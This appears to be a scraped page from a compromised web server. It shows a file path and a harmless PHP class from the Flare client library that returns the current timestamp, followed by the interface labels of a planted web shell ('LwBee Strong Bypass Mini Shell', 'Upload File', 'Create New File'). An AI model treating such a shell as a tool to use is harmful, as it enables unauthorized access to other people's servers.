/home/u503560585/domains/mscm.me/public_html/vendor/facade/flare-client-php/src/Time/SystemTime.php
<?php

namespace Facade\FlareClient\Time;

use DateTimeImmutable;

class SystemTime implements Time
{
    public function getCurrentTime(): int
    {
        return (new DateTimeImmutable())->getTimestamp();
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File